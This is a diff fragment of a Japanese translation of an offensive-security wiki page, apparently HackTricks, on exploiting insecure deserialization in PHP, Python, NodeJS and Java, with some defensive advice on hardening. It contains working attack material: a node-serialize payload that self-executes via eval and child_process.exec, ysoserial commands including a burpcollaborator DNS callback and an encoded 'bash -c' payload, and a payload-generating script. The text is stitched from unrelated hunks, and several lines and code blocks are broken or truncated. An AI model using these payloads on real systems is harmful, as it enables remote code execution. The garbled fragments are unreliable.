-`null` オリジンは、リダイレクトやローカル HTML ファイルのような状況で指定され、特異な位置を占めています。一部のアプリケーションは、ローカル開発を促進するためにこのオリジンをホワイトリストに登録し、結果的に任意のウェブサイトがサンドボックス化された iframe を通じて `null` オリジンを模倣できるようにし、CORS 制限を回避することを許可しています。
+`null`オリジンは、リダイレクトやローカルHTMLファイルのような状況で指定され、特異な位置を占めています。一部のアプリケーションは、このオリジンをホワイトリストに登録してローカル開発を促進しますが、これにより任意のウェブサイトがサンドボックス化されたiframeを通じて`null`オリジンを模倣でき、CORS制限を回避することが可能になります。
 ```html
 
 ```
 For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
 
-### \` またはリダイレクトを実行することができます(この場合は5秒後): ``
+**`meta http-equiv`** を使用して、Cookieを設定するなどの**いくつかのアクション**を実行できます: `` またはリダイレクトを実行することができます(この場合は5秒後): ``
 
-これは **http-equiv** に関する **CSP** で **回避** できます( `Content-Security-Policy: default-src 'self';` または `Content-Security-Policy: http-equiv 'self';`)
+これは、**http-equiv** に関する **CSP** で**回避**できます( `Content-Security-Policy: default-src 'self';` または `Content-Security-Policy: http-equiv 'self';`)
 
-### New \ [MyModel::class, DateTime::class]
 ]);
 ```
-もし**`allowed_classes`が省略されるか、コードがPHP < 7.0で実行される**場合、攻撃者が`__wakeup()`や`__destruct()`などのマジックメソッドを悪用するペイロードを作成できるため、呼び出しは**危険**になります。
+もし**`allowed_classes`が省略されるか、コードがPHP < 7.0で実行される**場合、攻撃者が`__wakeup()`や`__destruct()`のようなマジックメソッドを悪用するペイロードを作成できるため、呼び出しは**危険**になります。
 
 #### 実世界の例: Everest Forms (WordPress) CVE-2025-52709
 
@@ -160,7 +161,7 @@ O:8:"SomeClass":1:{s:8:"property";s:28:"";}
 ```
 管理者がエントリを表示すると、オブジェクトがインスタンス化され、`SomeClass::__destruct()`が実行され、任意のコードが実行される結果となりました。
 
-**重要なポイント**
+**ポイント**
 1. `unserialize()`を呼び出す際は、常に`['allowed_classes' => false]`(または厳格なホワイトリスト)を渡してください。
 2. 防御ラッパーを監査してください – それらはしばしばレガシーPHPブランチを忘れがちです。
 3. **PHP ≥ 7.x** へのアップグレードだけでは*不十分*です:オプションは明示的に指定する必要があります。
@@ -170,8 +171,8 @@ O:8:"SomeClass":1:{s:8:"property";s:28:"";}
 ### PHPGGC (PHP用のysoserial)
 
 [**PHPGGC**](https://github.com/ambionics/phpggc)は、PHPのデシリアライズを悪用するためのペイロードを生成するのに役立ちます。\
-アプリケーションのソースコード内でデシリアライズを悪用する方法を**見つけられない場合もありますが、外部PHP拡張のコードを**悪用できるかもしれません。\
-したがって、可能であれば、サーバーの`phpinfo()`を確認し、**インターネットで検索**(さらには**PHPGGCのガジェット**も)して、悪用できる可能性のあるガジェットを探してください。
+いくつかのケースでは、アプリケーションのソースコード内でデシリアライズを悪用する方法を**見つけることができない**かもしれませんが、**外部PHP拡張のコードを悪用することができるかもしれません。**\
+したがって、可能であれば、サーバーの`phpinfo()`を確認し、**インターネットで検索**(さらには**PHPGGCのガジェット**でも)して、悪用できる可能性のあるガジェットを探してください。
 
 ### phar:// メタデータデシリアライズ
 
@@ -197,7 +198,7 @@ print(base64.b64encode(pickle.dumps(P())))
 ```
 以下のバイパステクニックを確認する前に、`print(base64.b64encode(pickle.dumps(P(),2)))`を使用して、Python3を実行している場合にPython2と互換性のあるオブジェクトを生成してください。
 
-**pickle jail**からの脱出に関する詳細は、以下を確認してください:
+**pickle jails**からの脱出に関する詳細情報は次を確認してください:
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/
@@ -205,13 +206,13 @@ print(base64.b64encode(pickle.dumps(P())))
 
 ### Yaml **&** jsonpickle
 
-以下のページでは、**yamlの不安全なデシリアライズを悪用する技術**を紹介し、**Pickle, PyYAML, jsonpickle, ruamel.yaml**のためのRCEデシリアライズペイロードを生成するために使用できるツールで締めくくります:
+次のページでは、**yamlの不安全なデシリアライズを悪用する技術**を紹介し、**Pickle, PyYAML, jsonpickle, ruamel.yaml**のためのRCEデシリアライズペイロードを生成するために使用できるツールで締めくくります:
 
 {{#ref}}
 python-yaml-deserialization.md
 {{#endref}}
 
-### クラス汚染 (Pythonプロトタイプ汚染)
+### クラス汚染 (Python プロトタイプ汚染)
 
 {{#ref}}
 ../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md
@@ -219,10 +220,10 @@ python-yaml-deserialization.md
 
 ## NodeJS
 
-### JSマジック関数
+### JS マジック関数
 
-JSは、オブジェクトを作成するためだけに実行される**"マジック"関数**を持っていませんが、**`toString`**、**`valueOf`**、**`toJSON`**のように、**直接呼び出さなくても頻繁に使用される関数**があります。\
-デシリアライズを悪用する場合、これらの関数を**妥協して他のコードを実行**させることができれば、呼び出されたときに任意のコードを実行することができます。
+JSは、オブジェクトを作成するためだけに実行される**"マジック"関数**を持っていませんが、**`toString`**、**`valueOf`**、**`toJSON`**のように、**直接呼び出さなくても頻繁に使用される**いくつかの**関数**があります。\
+デシリアライズを悪用する場合、これらの関数を**妥協して他のコードを実行**させることができれば、呼び出されたときに任意のコードを実行できます。
 
 関数を直接呼び出さずに**"マジック"な方法**で呼び出すもう一つの方法は、**非同期関数**(プロミス)によって返されるオブジェクトを**妥協する**ことです。なぜなら、その**返されるオブジェクト**を**"then"という関数型のプロパティ**を持つ別の**プロミス**に**変換**すると、別のプロミスによって返されるだけで**実行される**からです。_詳細については_ [_**このリンク**_](https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/) _を参照してください。_
 ```javascript
@@ -250,7 +251,7 @@ test_then()
 ```
 ### `__proto__` と `prototype` の汚染
 
-この技術について学びたい場合は、**次のチュートリアルを参照してください**:
+この技術について学びたい場合は、**次のチュートリアルを参照してください**:
 
 {{#ref}}
 nodejs-proto-prototype-pollution/
@@ -258,7 +259,7 @@ nodejs-proto-prototype-pollution/
 
 ### [node-serialize](https://www.npmjs.com/package/node-serialize)
 
-このライブラリは関数をシリアライズすることを可能にします。例:
+このライブラリは関数をシリアライズすることを可能にします。例:
 ```javascript
 var y = {
 rce: function () {
@@ -275,7 +276,7 @@ console.log("Serialized: \n" + payload_serialized)
 ```bash
 {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
 ```
-関数がシリアライズされると、シリアライズされたオブジェクトに `_$$ND_FUNC$$_` フラグが追加されることが例に示されています。
+関数がシリアライズされると、シリアライズされたオブジェクトに `_$$ND_FUNC$$_` フラグが追加されることが例からわかります。
 
 ファイル `node-serialize/lib/serialize.js` 内で、同じフラグとそのコードの使用方法を見つけることができます。
 
@@ -283,9 +284,9 @@ console.log("Serialized: \n" + payload_serialized)
 
 ![](<../../images/image (446).png>)
 
-最後のコードのチャンクで見られるように、**フラグが見つかった場合**、`eval` が関数をデシリアライズするために使用されるため、基本的に **ユーザー入力が `eval` 関数内で使用されています**。
+最後のコードのチャンクでわかるように、**フラグが見つかった場合**、`eval` が関数をデシリアライズするために使用されるので、基本的に **ユーザー入力が `eval` 関数内で使用されている**ことになります。
 
-しかし、**関数をシリアライズするだけでは**、それを**実行することはありません**。なぜなら、コードの一部が**`y.rce`を呼び出す必要がある**からで、これは非常に**ありそうにありません**。\
+しかし、**関数をシリアライズするだけでは**それを**実行することはありません**。なぜなら、コードの一部が**`y.rce`を呼び出す必要がある**からで、これは非常に**ありそうにありません**。\
 それでも、**シリアライズされたオブジェクトを修正して**、**いくつかの括弧を追加する**ことで、オブジェクトがデシリアライズされるときにシリアライズされた関数を自動的に実行させることができます。\
 次のコードのチャンクで、**最後の括弧**と、`unserialize` 関数がどのように自動的にコードを実行するかに注意してください:
 ```javascript
@@ -295,18 +296,18 @@ rce: "_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(er
 }
 serialize.unserialize(test)
 ```
-以前に示したように、このライブラリは`_$$ND_FUNC$$_`の後のコードを取得し、**実行します** `eval`を使用して。したがって、**コードを自動実行する**には、**関数の作成**部分と最後の括弧を**削除し**、次の例のように**JSのワンライナーを実行する**ことができます:
+以前に示したように、このライブラリは`_$$ND_FUNC$$_`の後のコードを取得し、**実行します** `eval`を使用して。したがって、**コードを自動実行する**には、**関数の作成**部分と最後の括弧を**削除し**、次の例のように**JSのワンライナーを実行する**ことができます:
 ```javascript
 var serialize = require("node-serialize")
 var test =
 "{\"rce\":\"_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })\"}"
 serialize.unserialize(test)
 ```
-ここで[**詳細情報**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)を見つけることができます。この脆弱性を悪用する方法について。
+ここで[**詳細を見つけることができます**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **この脆弱性を悪用する方法について**。
 
 ### [funcster](https://www.npmjs.com/package/funcster)
 
-**funcster**の注目すべき点は、**標準の組み込みオブジェクト**へのアクセス不可であることです。これらはアクセス可能なスコープの外にあります。この制限により、組み込みオブジェクトのメソッドを呼び出そうとするコードの実行が妨げられ、`console.log()`や`require(something)`のようなコマンドを使用すると、`"ReferenceError: console is not defined"`のような例外が発生します。
+**funcster**の注目すべき点は、**標準の組み込みオブジェクト**へのアクセス不可であり、それらはアクセス可能なスコープの外にあります。この制限により、組み込みオブジェクトのメソッドを呼び出そうとするコードの実行が妨げられ、`console.log()`や`require(something)`のようなコマンドを使用すると、`"ReferenceError: console is not defined"`のような例外が発生します。
 
 この制限にもかかわらず、特定のアプローチを通じて、すべての標準の組み込みオブジェクトを含むグローバルコンテキストへの完全なアクセスを復元することが可能です。グローバルコンテキストを直接利用することで、この制限を回避できます。たとえば、次のスニペットを使用してアクセスを再確立できます:
 ```javascript
@@ -371,10 +372,10 @@ Javaでは、**デシリアライズコールバックはデシリアライズ
 
 #### ホワイトボックス
 
-コードベース内の潜在的なシリアライズ脆弱性を特定するには、次のものを検索します:
+コードベース内の潜在的なシリアライズ脆弱性を特定するには、次のものを検索してください:
 
 - `Serializable`インターフェースを実装しているクラス。
-- `java.io.ObjectInputStream`、`readObject`、`readUnshared`関数の使用。
+- `java.io.ObjectInputStream`、`readObject`、`readUnshare`関数の使用。
 
 特に注意を払うべき点:
 
@@ -387,7 +388,7 @@ Javaでは、**デシリアライズコールバックはデシリアライズ
 
 #### ブラックボックス
 
-ブラックボックステストでは、javaシリアライズオブジェクトを示す特定の**シグネチャまたは「マジックバイト」**を探します(`ObjectInputStream`から発生):
+ブラックボックステストでは、javaシリアライズオブジェクトを示す特定の**シグネチャまたは「マジックバイト」**を探してください(`ObjectInputStream`から発生):
 
 - 16進パターン:`AC ED 00 05`。
 - Base64パターン:`rO0`。
@@ -409,35 +410,35 @@ javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAA
 find . -iname "*commons*collection*"
 grep -R InvokeTransformer .
 ```
-あなたは、**脆弱性が知られているすべてのライブラリ**を確認し、[**Ysoserial**](https://github.com/frohoff/ysoserial)が提供できるエクスプロイトを探すことができます。または、[Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json)に示されているライブラリを確認することもできます。\
+あなたは、**脆弱性が知られているすべてのライブラリを確認し**、それに対して[**Ysoserial**](https://github.com/frohoff/ysoserial)がエクスプロイトを提供できるかもしれません。または、[Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json)に示されているライブラリを確認することもできます。\
 さらに、[**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector)を使用して、エクスプロイト可能な可能性のあるガジェットチェーンを検索することもできます。\
 **gadgetinspector**を実行する際(ビルド後)は、発生する多数の警告/エラーを気にせず、完了するまで待ってください。すべての結果は_gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_に書き込まれます。**gadgetinspectorはエクスプロイトを作成せず、偽陽性を示す可能性があることに注意してください**。
 
 #### ブラックボックステスト
 
-Burp拡張機能[**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md)を使用すると、**どのライブラリが利用可能か**(バージョンも含む)を特定できます。この情報をもとに、脆弱性をエクスプロイトするための**ペイロードを選択しやすくなる**でしょう。\
+Burp拡張機能[**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md)を使用すると、**どのライブラリが利用可能か**(バージョンも含む)を特定できます。この情報をもとに、脆弱性をエクスプロイトするための**ペイロードを選択しやすくなる**かもしれません。\
 [**GadgetProbeについて詳しく学ぶにはこちらをお読みください**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**。**\
 GadgetProbeは**`ObjectInputStream`のデシリアライズ**に焦点を当てています。
 
-Burp拡張機能[**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)を使用すると、**ysoserialでエクスプロイト可能な脆弱なライブラリを特定**し、**それらをエクスプロイト**できます。\
+Burp拡張機能[**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)を使用すると、**ysoserialでエクスプロイト可能な脆弱なライブラリを特定**し、それを**エクスプロイト**できます。\
 [**Java Deserialization Scannerについて詳しく学ぶにはこちらをお読みください。**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)\
 Java Deserialization Scannerは**`ObjectInputStream`**のデシリアライズに焦点を当てています。
 
-[**Freddy**](https://github.com/nccgroup/freddy)を使用して、**Burp**内のデシリアライズの脆弱性を**検出**することもできます。このプラグインは、**`ObjectInputStream`**に関連する脆弱性だけでなく、**Json**や**Yml**デシリアライズライブラリの脆弱性も検出します。アクティブモードでは、スリープやDNSペイロードを使用して確認を試みます。\
+また、[**Freddy**](https://github.com/nccgroup/freddy)を使用して、**Burp**内のデシリアライズの脆弱性を**検出**することもできます。このプラグインは、**`ObjectInputStream`**に関連する脆弱性だけでなく、**Json**や**Yml**デシリアライズライブラリからの脆弱性も検出します。アクティブモードでは、スリープやDNSペイロードを使用してそれらを確認しようとします。\
 [**Freddyについての詳細情報はこちらで確認できます。**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)
 
 **シリアライズテスト**
 
-サーバーが使用している脆弱なライブラリを確認するだけではありません。時には、**シリアライズされたオブジェクト内のデータを変更して、いくつかのチェックをバイパスする**ことができるかもしれません(ウェブアプリ内で管理者権限を付与するかもしれません)。\
+サーバーが使用している脆弱なライブラリを確認するだけではありません。時には、**シリアライズされたオブジェクト内のデータを変更して、いくつかのチェックをバイパスできる**場合があります(ウェブアプリ内で管理者権限を付与されるかもしれません)。\
 ウェブアプリケーションに送信されるJavaシリアライズオブジェクトを見つけた場合、**[**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper)を使用して、送信されるシリアライズオブジェクトをより人間が読みやすい形式で印刷することができます**。送信しているデータを知ることで、それを変更していくつかのチェックをバイパスするのが容易になります。
 
 ### **エクスプロイト**
 
 #### **ysoserial**
 
-Javaデシリアライズをエクスプロイトするための主なツールは[**ysoserial**](https://github.com/frohoff/ysoserial)です([**こちらからダウンロード**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar))。また、複雑なコマンド(パイプなど)を使用できる[**ysoseral-modified**](https://github.com/pimps/ysoserial-modified)の使用も検討できます。\
-このツールは**`ObjectInputStream`**のエクスプロイトに**焦点を当てている**ことに注意してください。\
-私は**RCEペイロードの前に「URLDNS」ペイロードを使用することをお勧めします**。注目すべきは、「URLDNS」ペイロードが機能しない場合でも、他のRCEペイロードが機能する可能性があることです。
+Javaデシリアライズをエクスプロイトするための主なツールは[**ysoserial**](https://github.com/frohoff/ysoserial)です([**こちらからダウンロード**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar))。また、複雑なコマンド(例えばパイプを使用)を使用できる[**ysoseral-modified**](https://github.com/pimps/ysoserial-modified)の使用も検討できます。\
+このツールは**`ObjectInputStream`**のエクスプロイトに**焦点を当てています**。\
+私は**RCEペイロードの前に「URLDNS」ペイロードを使用することを始める**ことをお勧めします。注目すべきは、「URLDNS」ペイロードが機能しない場合でも、他のRCEペイロードが機能する可能性があることです。
 ```bash
 # PoC to make the application perform a DNS req
 java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
@@ -482,9 +483,9 @@ java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb
 # Base64 encode payload in base64
 base64 -w0 payload
 ```
-**java.lang.Runtime.exec()** のペイロードを作成する際、実行の出力をリダイレクトするために ">" や "|" のような **特殊文字** を使用することはできません。また、コマンドを実行するために "$()" を使用したり、**スペース** で区切られた **引数** をコマンドに渡すこともできません(`echo -n "hello world"` は可能ですが、`python2 -c 'print "Hello world"'` はできません)。ペイロードを正しくエンコードするために、[このウェブページ](http://www.jackson-t.ca/runtime-exec-payloads.html) を使用することができます。
+**java.lang.Runtime.exec()** のペイロードを作成する際、実行の出力をリダイレクトするために ">" や "|" のような特殊文字を使用することはできません。また、コマンドを実行するために "$()" を使用したり、**スペース**で区切られた**引数**をコマンドに渡すこともできません(`echo -n "hello world"` は可能ですが、`python2 -c 'print "Hello world"'` はできません)。ペイロードを正しくエンコードするために、[このウェブページ](http://www.jackson-t.ca/runtime-exec-payloads.html)を使用することができます。
 
-次のスクリプトを使用して、Windows と Linux の **すべての可能なコード実行** ペイロードを作成し、脆弱なウェブページでテストしてください:
+次のスクリプトを使用して、Windows と Linux のための**すべての可能なコード実行**ペイロードを作成し、脆弱なウェブページでテストしてください:
 ```python
 import os
 import base64
@@ -507,12 +508,12 @@ generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
 ```
 #### serialkillerbypassgadgets
 
-あなたは**https://github.com/pwntester/SerialKillerBypassGadgetCollection**を**ysoserialと一緒に使用して、より多くのエクスプロイトを作成することができます**。このツールに関する詳細は、ツールが発表された**トークのスライド**にあります: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
+You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **along with ysoserial to create more exploits**. More information about this tool in the **slides of the talk** where the tool was presented: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
 
 #### marshalsec
 
 [**marshalsec** ](https://github.com/mbechler/marshalsec)は、Javaの異なる**Json**および**Yml**シリアル化ライブラリを悪用するためのペイロードを生成するために使用できます。\
-プロジェクトをコンパイルするために、私は`pom.xml`にこの**依存関係**を**追加する必要がありました**:
+プロジェクトをコンパイルするために、`pom.xml`にこの**依存関係**を**追加**する必要がありました:
 ```html
 
 javax.activation
@@ -555,7 +556,7 @@ Javaはさまざまな目的で多くのシリアル化を使用します:
 
 #### Transient objects
 
-`Serializable`を実装するクラスは、シリアル化されるべきでないクラス内の任意のオブジェクトを`transient`として実装できます。例えば:
+`Serializable`を実装するクラスは、シリアル化すべきでないクラス内の任意のオブジェクトを`transient`として実装できます。例えば:
 ```java
 public class myAccount implements Serializable
 {
@@ -572,12 +573,12 @@ throw new java.io.IOException("Cannot be deserialized");
 ```
 #### **Javaにおけるデシリアライズセキュリティの強化**
 
-**`java.io.ObjectInputStream`のカスタマイズ**は、デシリアライズプロセスを保護するための実用的なアプローチです。この方法は、次の場合に適しています:
+**`java.io.ObjectInputStream`のカスタマイズ**は、デシリアライズプロセスを保護するための実用的なアプローチです。この方法は、以下の場合に適しています。
 
 - デシリアライズコードがあなたの管理下にある。
 - デシリアライズのために期待されるクラスが知られている。
 
-**`resolveClass()`**メソッドをオーバーライドして、許可されたクラスのみにデシリアライズを制限します。これにより、明示的に許可されたクラス以外のデシリアライズが防止されます。以下の例では、デシリアライズを`Bicycle`クラスのみに制限しています:
+**`resolveClass()`**メソッドをオーバーライドして、許可されたクラスのみにデシリアライズを制限します。これにより、明示的に許可されたクラス以外のデシリアライズが防止されます。以下の例では、デシリアライズを`Bicycle`クラスのみに制限しています。
 ```java
 // Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
 public class LookAheadObjectInputStream extends ObjectInputStream {
@@ -598,7 +599,7 @@ return super.resolveClass(desc);
 }
 }
 ```
-**セキュリティ強化のためのJavaエージェントの使用**は、コードの修正が不可能な場合のフォールバックソリューションを提供します。この方法は主に**有害なクラスのブラックリスト化**に適用され、JVMパラメータを使用します:
+**セキュリティ強化のためのJavaエージェントの使用**は、コードの修正が不可能な場合の代替ソリューションを提供します。この方法は主に**有害なクラスのブラックリスト化**に適用され、JVMパラメータを使用します:
 ```
 -javaagent:name-of-agent.jar
 ```
@@ -623,8 +624,8 @@ ObjectInputFilter.Config.setSerialFilter(filter);
 **外部ライブラリを活用したセキュリティの強化**: **NotSoSerial**、**jdeserialize**、および**Kryo**などのライブラリは、Javaのデシリアライズを制御および監視するための高度な機能を提供します。これらのライブラリは、クラスのホワイトリストやブラックリストの作成、デシリアライズ前のシリアライズされたオブジェクトの分析、カスタムシリアライズ戦略の実装など、追加のセキュリティ層を提供できます。
 
 - **NotSoSerial**は、信頼できないコードの実行を防ぐためにデシリアライズプロセスを傍受します。
-- **jdeserialize**は、デシリアライズせずにシリアライズされたJavaオブジェクトを分析でき、潜在的に悪意のあるコンテンツを特定するのに役立ちます。
-- **Kryo**は、速度と効率を重視した代替シリアライゼーションフレームワークで、セキュリティを強化できる構成可能なシリアライゼーション戦略を提供します。
+- **jdeserialize**は、シリアライズされたJavaオブジェクトをデシリアライズせずに分析することを可能にし、潜在的に悪意のあるコンテンツを特定するのに役立ちます。
+- **Kryo**は、速度と効率を重視した代替のシリアライズフレームワークで、セキュリティを強化できる構成可能なシリアライズ戦略を提供します。
 
 ### 参考文献
 
@@ -632,17 +633,18 @@ ObjectInputFilter.Config.setSerialFilter(filter);
 - デシリアライズとysoserialのトーク: [http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
 - [https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)
 - [https://www.youtube.com/watch?v=VviY3O-euVQ](https://www.youtube.com/watch?v=VviY3O-euVQ)
-- gadgetinspectorについてのトーク: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) とスライド: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
+- gadgetinspectorについてのトーク: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) およびスライド: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
 - Marshalsec論文: [https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
 - [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr)
 - [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
 - [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html)
-- Javaと.NetのJSONデシリアライズ **論文:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** トーク: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) とスライド: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+- Javaと.NetのJSONデシリアライズ **論文:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** トーク: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) およびスライド: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 - デシリアライズのCVE: [https://paper.seebug.org/123/](https://paper.seebug.org/123/)
 
 ## JNDIインジェクション & log4Shell
 
-**JNDIインジェクションとは何か、RMI、CORBA & LDAPを介してどのように悪用するか、log4shellをどのように悪用するか**(およびこの脆弱性の例)については、以下のページを参照してください:
+**JNDIインジェクションとは何か、RMI、CORBA、LDAPを介してどのように悪用するか、log4shellをどのように悪用するか**(およびこの脆弱性の例)については、以下のページを参照してください:
+
 
 {{#ref}}
 jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -654,7 +656,7 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 ### 製品
 
-このミドルウェアを使用してメッセージを送信する製品はいくつかあります:
+このミドルウェアを使用してメッセージを送信する製品はいくつかあります:
 
 ![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../images/image (314).png>)
 
@@ -665,13 +667,13 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 基本的に、**危険な方法でJMSを使用しているサービスが多数存在します**。したがって、これらのサービスにメッセージを送信するための**十分な権限**がある場合(通常は有効な資格情報が必要です)、**デシリアライズされる悪意のあるシリアライズオブジェクトを送信できる可能性があります**。\
 これは、この悪用において、**そのメッセージを使用するすべてのクライアントが感染する**ことを意味します。
 
-サービスが脆弱である場合(ユーザー入力を安全でない方法でデシリアライズしているため)、脆弱性を悪用するための有効なガジェットを見つける必要があることを忘れないでください。
+サービスが脆弱である場合(ユーザー入力を安全でない方法でデシリアライズしているため)、脆弱性を悪用するためには有効なガジェットを見つける必要があることを忘れないでください。
 
-ツール[**JMET**](https://github.com/matthiaskaiser/jmet)は、**既知のガジェットを使用してシリアライズされた悪意のあるオブジェクトを送信するためにこれらのサービスに接続して攻撃する**ために作成されました。これらのエクスプロイトは、サービスがまだ脆弱であり、使用されるガジェットのいずれかが脆弱なアプリケーション内に存在する場合に機能します。
+ツール[**JMET**](https://github.com/matthiaskaiser/jmet)は、**既知のガジェットを使用してシリアライズされた複数の悪意のあるオブジェクトを送信するためにこれらのサービスに接続して攻撃するために作成されました**。これらのエクスプロイトは、サービスが依然として脆弱であり、使用されるガジェットのいずれかが脆弱なアプリケーション内に存在する場合に機能します。
 
 ### 参考文献
 
-- [Patchstack advisory – Everest Forms unauthenticated PHP Object Injection (CVE-2025-52709)](https://patchstack.com/articles/critical-vulnerability-impacting-over-100k-sites-patched-in-everest-forms-plugin/)
+- [Patchstack advisory – Everest Formsの認証されていないPHPオブジェクトインジェクション(CVE-2025-52709)](https://patchstack.com/articles/critical-vulnerability-impacting-over-100k-sites-patched-in-everest-forms-plugin/)
 
 - JMETトーク: [https://www.youtube.com/watch?v=0h8DWiOWGGA](https://www.youtube.com/watch?v=0h8DWiOWGGA)
 - スライド: [https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)
@@ -684,7 +686,7 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 #### ホワイトボックス
 
-ソースコードを検査して、以下の出現を探すべきです:
+ソースコードは、以下の出現を検査する必要があります:
 
 1. `TypeNameHandling`
 2. `JavaScriptTypeResolver`
@@ -693,28 +695,28 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 #### ブラックボックス
 
-検索は、Base64エンコードされた文字列**AAEAAAD/////**または、サーバー側でデシリアライズされる可能性のある類似のパターンを対象とするべきです。これには、`TypeObject`や`$type`を含む**JSON**または**XML**構造が含まれる可能性がありますが、これに限定されません。
+検索は、サーバー側でデシリアライズされる可能性のあるBase64エンコードされた文字列**AAEAAAD/////**または類似のパターンを対象とする必要があります。これには、`TypeObject`や`$type`を含むがこれに限定されない**JSON**または**XML**構造が含まれる可能性があります。
 
 ### ysoserial.net
 
